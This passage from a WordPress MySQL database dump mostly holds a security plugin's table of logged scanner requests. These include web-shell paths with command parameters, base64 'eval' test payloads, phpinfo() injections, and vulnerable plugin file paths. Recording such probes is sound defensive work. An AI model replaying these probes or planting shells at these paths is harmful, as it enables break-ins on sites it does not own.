p.php?test=1'),(1,'/wp-content/uploads/2016/02/new_up.php?cmd=free'),(1,'/wp-content/uploads/2016/02/new_up.php?cmd=help'),(1,'/wp-content/uploads/2016/02/new_up.php?test=1'),(1,'/wp-content/uploads/2016/03/new_up.php?test=1'),(1,'/wp-content/uploads/2016/04/new_up.php?test=1'),(1,'/wp-content/uploads/2016/9/28512844.php'),(1,'/wp-content/uploads/2016/9/3839274.php'),(1,'/wp-content/uploads/2016/9/74174984.php'),(1,'/wp-content/uploads/4328048.php'),(1,'/wp-content/uploads/500.php'),(1,'/wp-content/uploads/754398.php'),(1,'/wp-content/uploads/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-content/uploads/annvicky.php'),(1,'/wp-content/uploads/bc.php'),(1,'/wp-content/uploads/BirdsRio.php'),(1,'/wp-content/uploads/class-wp-upgrade.php'),(1,'/wp-content/uploads/configbacks.php?ing=lie'),(1,'/wp-content/uploads/default.php'),(1,'/wp-content/uploads/Fbrrchive.php'),(1,'/wp-content/uploads/files/guest/05289766.php'),(1,'/wp-content/uploads/files/guest/2495595.php'),(1,'/wp-content/uploads/files/guest/27662672.php'),(1,'/wp-content/uploads/help.php'),(1,'/wp-content/uploads/helpme.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/uploads/index.php'),(1,'/wp-content/uploads/infos.php'),(1,'/wp-content/uploads/license.php'),(1,'/wp-content/uploads/locate.php'),(1,'/wp-content/uploads/moser.php'),(1,'/wp-content/uploads/new_up.php?cmd=free'),(1,'/wp-content/uploads/new_up.php?cmd=help'),(1,'/wp-content/uploads/new_up.php?test=1'),(1,'/wp-content/uploads/phpinfo.php'),(1,'/wp-content/uploads/pinfo.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/uploads/rss.class.php'),(1,'/wp-content/uploads/rv024xp6.php'),(1,'/wp-content/uploads/samplc.php'),(1,'/wp-content/uploads/sfn.php'),(1,'/wp-content/uploads/slic.php'),(1,'/wp-content/uploads/SocketIontrol.php'),(1,'/wp-content/uploads/sql_dump.php'),(1,'/wp-content/uploads/style.php'),(1,'/wp-content/uploads/svp/optinbuttons/2013012621-27-49filem.php?cmd=free'),(1,'/wp-content/uploads/svp/optinbuttons/2013012621-27-49filem.php?cmd=help'),(1,'/wp-content/uploads/thumbnail.php'),(1,'/wp-content/uploads/tpzf64nd.php'),(1,'/wp-content/uploads/update.php?q=pass34'),(1,'/wp-content/uploads/upfilees.php'),(1,'/wp-content/uploads/user_uploads/db.php'),(1,'/wp-content/uploads/woo.php'),(1,'/wp-content/uploads/wooh.php'),(1,'/wp-content/uploads/wp-cache.php'),(1,'/wp-content/uploads/wp-cros.php'),(1,'/wp-content/uploads/wp-fillez.php'),(1,'/wp-content/uploads/wp-footers.php'),(1,'/wp-content/uploads/wp-index.php'),(1,'/wp-content/uploads/wp-indexst.php?ugdts7nltro=eval'),(1,'/wp-content/uploads/wp-lib.php'),(1,'/wp-content/uploads/wp-sitemaps.php'),(1,'/wp-content/uploads/wp-up.php'),(1,'/wp-content/uploads/wp-update.php'),(1,'/wp-content/uploads/wpallimport/uploads/25e80cf74453b9530965eb5d3e0ce839/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/2f5e35c81b33bcee053e7dfff05b78fc/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/35063ece6483121b04605408c43248ed/db.php'),(1,'/wp-content/uploads/wpallimport/uploads/446c06e501ecedf720acad921c7e7ef7/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/6714d299ef25b206f9ff22cb6be40516/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/6a7e6473082dfcdfe184aca9fd0a1cdc/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/6bcf3a26a4f09b9cc1c78b7b0e389f50/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/6c66ea2b2705b9a08aab149ea0d9ae30/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/700467c42026976fc3c0664f311fe161/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/7699f41d8c59430a20a5789970a9d9a0/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/84d530dc6bd704f7c138acec7544f68e/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/98ac1f4ac14317cfa771b3ccaf0c7e70/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/9aaab333e4014cc5dd813e742f19f4fc/db.php'),(1,'/wp-content/uploads/wpallimport/uploads/a9b361a9d8b6c6bf6d86ed902166da69/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/b523e114e20dd0fbdc74f61f7bedec43/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/c5647c41b01d43f4e9f78fbeb1cf2235/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/df2875ec8df1691f1f6702a343a9b6f7/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/dfb280f6e3ff3858af5cde9471dd118c/db.php'),(1,'/wp-content/uploads/wpallimport/uploads/e6171b953b0a7d792021c0ebff869a6d/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/ec97f82d29fa727d5572468680e4456f/info.php'),(1,'/wp-content/uploads/wpallimport/uploads/fe3275ca446ee5415e9c01f1b0f9f777/info.php'),(1,'/wp-content/uploads/wpconf.php'),(1,'/wp-content/uploads/wpfeet.php'),(1,'/wp-content/uploads/wpfoot.php'),(1,'/wp-content/uploads/wpmp-previews/db.php'),(1,'/wp-content/uploads/wysija/themes/2/update-bak.php5?cmd=free'),(1,'/wp-content/uploads/wysija/themes/2/update-bak.php5?cmd=help'),(1,'/wp-content/uploads/wysija/themes/2/update-bak.php5?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/uploads/wysija/themes/2/update-bak.php?cmd=free'),(1,'/wp-content/uploads/wysija/themes/2/update-bak.php?cmd=help'),(1,'/wp-content/uploads/wysija/themes/2/update-bak.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/uploads/wysija/themes/main2/'),(1,'/wp-content/uploads/wysija/themes/main2/index.php'),(1,'/wp-content/uploads/wysija/themes/sketchys/sket.php?smd=phpinfo();'),(1,'/wp-content/uploads/ysh.php'),(1,'/wp-content/uploads/_input__test.php.?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-content/uploads/_wp_cache.php'),(1,'/wp-content/wp-functions.php'),(1,'/wp-content/wp-misc.php'),(1,'/wp-content/_hash.php'),(1,'/wp-content_/uploads/2015/11/new_up.php?cmd=free'),(1,'/wp-content_/uploads/2015/11/new_up.php?cmd=help'),(1,'/wp-contnt/themes/Newspaper/404.php'),(1,'/wp-contnt/themes/Newspaper/author.php'),(1,'/wp-contnt/themes/Newspaper/dump.php'),(1,'/wp-contnt/themes/Newspaper/info.php'),(1,'/wp-cros.php'),(1,'/wp-data.php'),(1,'/wp-datas.php?RequestType=Test'),(1,'/wp-feeds.php'),(1,'/wp-feeds.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=free'),(1,'/wp-feeds.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-footers.php'),(1,'/wp-forms-ajax.php'),(1,'/wp-gmail.php'),(1,'/wp-headers-class.php'),(1,'/wp-imporst.php'),(1,'/wp-includes/adodb.class.php'),(1,'/wp-includes/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/az1.php?sam=cHJpbnQgIjEyMyIuIjQ1NDMyMSI7'),(1,'/wp-includes/certificates/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/certificates/system.php'),(1,'/wp-includes/class-filesystem.php'),(1,'/wp-includes/class-inlocal.php'),(1,'/wp-includes/class-inlocal.php?p=54e71e3b&c=phpinfo();'),(1,'/wp-includes/class-wp-customize-perl.php'),(1,'/wp-includes/class-wp-mail.php'),(1,'/wp-includes/class-wp-media.php'),(1,'/wp-includes/class-wp-upgrade.php'),(1,'/wp-includes/class.wp-date.php'),(1,'/wp-includes/core.php'),(1,'/wp-includes/css/login_wall.php?login=cmd'),(1,'/wp-includes/css/maink.php'),(1,'/wp-includes/css/modules.php'),(1,'/wp-includes/css/system.php'),(1,'/wp-includes/entry.php'),(1,'/wp-includes/error-log.php'),(1,'/wp-includes/error_log.php'),(1,'/wp-includes/fonts/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/fonts/system.php'),(1,'/wp-includes/ID3/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/ID3/license.php'),(1,'/wp-includes/id3/system.php'),(1,'/wp-includes/ID3/wp-cros.php'),(1,'/wp-includes/images/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/images/wlw/license.php'),(1,'/wp-includes/insmod.php'),(1,'/wp-includes/js/bc.php'),(1,'/wp-includes/js/crop/sys.php'),(1,'/wp-includes/js/jcrop/sys.php'),(1,'/wp-includes/js/jquery/ui/main.php'),(1,'/wp-includes/js/js/wp-load.php'),(1,'/wp-includes/js/system.php'),(1,'/wp-includes/js/tinymce/error-log.php'),(1,'/wp-includes/js/tinymce/langs/main.php'),(1,'/wp-includes/js/tinymce/plugins/fullscreen/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/js/tinymce/plugins/media/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/js/tinymce/plugins/paste/pdo.inc.php'),(1,'/wp-includes/js/tinymce/plugins/textcolor/ajax-requests.new.php'),(1,'/wp-includes/js/tinymce/plugins/wpeditimage/ui-elements.php'),(1,'/wp-includes/js/tinymce/plugins/wpemoji/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/js/tinymce/skins/wordpress/images/wp-manage.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/default/class.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/default/img/class.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/class.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/class.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/main.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php'),(1,'/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php'),(1,'/wp-includes/js/tinymce/themes/advanced/thumbs.php'),(1,'/wp-includes/js/tinymce/themes/main.php'),(1,'/wp-includes/js/tinymce/utils/main.php'),(1,'/wp-includes/license.php'),(1,'/wp-includes/login.php?login=cmd'),(1,'/wp-includes/ms-default-base.php'),(1,'/wp-includes/ms-files-qu.php'),(1,'/wp-includes/pomo/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/pomo/error-log.php'),(1,'/wp-includes/pomo/files.php'),(1,'/wp-includes/pomo/function-cloud.php'),(1,'/wp-includes/pomo/pomo.php'),(1,'/wp-includes/pomo/systemc.php'),(1,'/wp-includes/pomo/test.php'),(1,'/wp-includes/pomo/wp-setting.php'),(1,'/wp-includes/post-thumbnaill-templete.php'),(1,'/wp-includes/pro/login.php?cmd=free'),(1,'/wp-includes/pro/login.php?cmd=help'),(1,'/wp-includes/random_compat/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/sample.php?sam=cHJpbnQgIjEyMyIuIjQ1NDMyMSI7'),(1,'/wp-includes/security.php'),(1,'/wp-includes/SimplePie/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/SimplePie/mil.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=free'),(1,'/wp-includes/SimplePie/mil.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-includes/simplepie/system.php'),(1,'/wp-includes/systemcache.php'),(1,'/wp-includes/Text/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/Text/Diff/Engine/cache.php?cmd=free'),(1,'/wp-includes/Text/Diff/Engine/cache.php?cmd=help'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=bat&cmd=free'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=bat&cmd=help'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=das&cmd=free'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=das&cmd=help'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=ice&cmd=free'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=ice&cmd=help'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=lev&cmd=free'),(1,'/wp-includes/Text/Diff/Engine/cache.php?ms-load=lev&cmd=help'),(1,'/wp-includes/Text/Diff/Engine/cache.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-includes/Text/Diff/Engine/rss.class.php'),(1,'/wp-includes/Text/Diff/Engine/wp-cros.php'),(1,'/wp-includes/Text/Diff/Engine/wp-up.php'),(1,'/wp-includes/Text/Diff/license.php'),(1,'/wp-includes/Text/Diff/wp-cros.php'),(1,'/wp-includes/text/system.php'),(1,'/wp-includes/theme-compat/adodb.class.php?array=ZXZhbCgnZWNobyAzMjY0MjYyMzQ2OycpOw'),(1,'/wp-includes/theme-compat/class-filesystem.php'),(1,'/wp-includes/theme-compat/comments-popup_backup.php?ver_full&token=1257'),(1,'/wp-includes/theme-compat/maink.php'),(1,'/wp-includes/theme-compat/system.php'),(1,'/wp-includes/upgrade/theme-compat/11.php'),(1,'/wp-includes/upgrade/theme-compat/popup-pomo.php'),(1,'/wp-includes/upgrade/theme-compat/wp-functions.php'),(1,'/wp-includes/upgrade/theme-compat/wp-up.php'),(1,'/wp-includes/var.php'),(1,'/wp-includes/widgets/title.php'),(1,'/wp-includes/wp-cros.php'),(1,'/wp-includes/wp-xmpp.php'),(1,'/wp-includes/wp-YSkmW_.php?cmd=free'),(1,'/wp-includes/wp-YSkmW_.php?cmd=help'),(1,'/wp-includes/xmlrpc.php?e=system&x=free¶m1=system¶m2=free'),(1,'/wp-includes/_hash.php'),(1,'/wp-indeks.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=free'),(1,'/wp-indeks.php?password=&action=publish&blog=1&test=1&ms-load=ice&cmd=help'),(1,'/wp-inform.php'),(1,'/wp-insorsm.php'),(1,'/wp-installation.php'),(1,'/wp-installation.php?pass=wcwc2016'),(1,'/wp-jqmain.php'),(1,'/wp-kernel.php'),(1,'/wp-lib.php'),(1,'/wp-license.php'),(1,'/wp-log.php'),(1,'/wp-logs.php'),(1,'/wp-menu.php'),(1,'/wp-misc.php'),(1,'/wp-object-cache.php'),(1,'/wp-plugin.php'),(1,'/wp-post.php'),(1,'/wp-pp.php'),(1,'/wp-readme.php'),(1,'/wp-referer.php'),(1,'/wp-register.php'),(1,'/wp-robots.php'),(1,'/wp-setup-step2.php'),(1,'/wp-sitemap.php'),(1,'/wp-sitemaps.php'),(1,'/wp-slider.php?FRbTXUOklS94b10'),(1,'/wp-smtp.php?p=1'),(1,'/wp-smtp.php?up'),(1,'/wp-temp-x43.php'),(1,'/wp-terms.php'),(1,'/wp-tmp.php'),(1,'/wp-touchn.php'),(1,'/wp-up.php'),(1,'/wp-wordpress.php'),(1,'/wp-xmlrpc.php'),(1,'/wp-xmpp.php'),(1,'/wp.php'),(1,'/wp/wp-admin/'),(1,'/wp/wp-admin/setup-config.php'),(1,'/wp/wp-login.php'),(1,'/wpconf.php'),(1,'/wpfoot.php'),(1,'/wpfoot2.php'),(1,'/wpfoot2.php.suspected_'),(1,'/wpfootes.php'),(1,'/wpindex.php'),(1,'/wpradmin/cache/3/8/ini.php'),(1,'/wp_cache_87649.php'),(1,'/wp_ifgbgf.php'),(1,'/wp_stkkn.php?e=system&x=free¶m1=system¶m2=free'),(1,'/wsdl.php'),(1,'/wso.php'),(1,'/wso2.php'),(1,'/x.php'),(1,'/xharzpqdt.html'),(1,'/xml.php'),(1,'/xml.php?n3729f7'),(1,'/xml.php?q3729f7'),(1,'/xml1-wp2.php'),(1,'/xmlrpc-activate.php'),(1,'/xmlrppc.php'),(1,'/xsotplus/flink.php'),(1,'/xx.php'),(1,'/ycportal/js/wbTextBox/showimg.jsp'),(1,'/ycportal/webpublish/module.main'),(1,'/yfqqplus/flink.php'),(1,'/zabbix/'),(1,'/zachary-quinto'),(1,'/zachary-quinto/'),(1,'/zachary-quinto/feed/'),(1,'/zblog/'),(1,'/zcms/'),(1,'/zfxtinstall/index.php.bak'),(1,'/zmzbindex.action'),(1,'/_license.php'),(1,'http://BIRTHDAYPEDIA.COM/'),(1,'http://BIRTHDAYPEDIA.COM/?author=1'),(1,'http://BIRTHDAYPEDIA.COM/?author=2'),(1,'http://BIRTHDAYPEDIA.COM/administrator/'),(1,'http://BIRTHDAYPEDIA.COM/plugins/content/s5_media_player/s5_media_player.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/another-wordpress-classifieds-plugin/AWPCP.po'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/category-grid-view-gallery/cat_grid.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/custom-content-type-manager/index.html'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/font-uploader/font-uploader-free.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/front-end-upload/destination.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/gallery-plugin/gallery-plugin.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/magic-fields/MF_Constant.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/resume-submissions-job-postings/installer.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/simple-dropbox-upload-form/'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/simple-dropbox-upload-form/index.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/wp-easy-gallery-pro/admin/php.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/wp-filemanager/fm.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/wp-homepage-slideshow/functions.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/wp-image-news-slider/functions.php'),(1,'http://BIRTHDAYPEDIA.COM/wp-content/plugins/wp-property/action_hooks.php');
/*!40000 ALTER TABLE `wp_wpss_clear` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wpss_links`
--
DROP TABLE IF EXISTS `wp_wpss_links`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpss_links` (
`url` varchar(255) NOT NULL DEFAULT '',
`type` varchar(20) NOT NULL DEFAULT 'other',
`type2` varchar(20) NOT NULL DEFAULT 'other',
`id` bigint(20) unsigned DEFAULT 0,
PRIMARY KEY (`url`),
KEY `type` (`type`),
KEY `type2` (`type`,`type2`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wpss_links`
--
LOCK TABLES `wp_wpss_links` WRITE;
/*!40000 ALTER TABLE `wp_wpss_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpss_links` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wpss_log`
--
DROP TABLE IF EXISTS `wp_wpss_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpss_log` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`event` int(5) unsigned NOT NULL,
`time` int(10) unsigned NOT NULL,
`ip` varchar(50) NOT NULL,
`ip_country` varchar(3) NOT NULL,
`info` varchar(255) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `event` (`event`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wpss_log`
--
LOCK TABLES `wp_wpss_log` WRITE;
/*!40000 ALTER TABLE `wp_wpss_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpss_log` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Dumping routines for database 'birthday_bp'
--
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2023-12-18 16:28:40
|